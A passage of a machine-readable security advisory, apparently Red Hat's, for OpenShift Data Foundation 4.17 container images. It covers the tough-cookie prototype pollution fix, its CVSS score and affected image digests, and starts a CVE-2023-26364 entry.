"url": "https://github.com/salesforce/tough-cookie/commit/12d474791bb856004e858fdb1c47b7608d09cf6e"
},
{
"category": "external",
"summary": "https://github.com/salesforce/tough-cookie/issues/282",
"url": "https://github.com/salesforce/tough-cookie/issues/282"
},
{
"category": "external",
"summary": "https://github.com/salesforce/tough-cookie/releases/tag/v4.1.3",
"url": "https://github.com/salesforce/tough-cookie/releases/tag/v4.1.3"
},
{
"category": "external",
"summary": "https://lists.debian.org/debian-lts-announce/2023/07/msg00010.html",
"url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00010.html"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JS-TOUGHCOOKIE-5672873",
"url": "https://security.snyk.io/vuln/SNYK-JS-TOUGHCOOKIE-5672873"
}
],
"release_date": "2023-07-01T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "tough-cookie: prototype pollution in cookie memstore"
},
{
"cve": "CVE-2023-26364",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2023-11-17T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
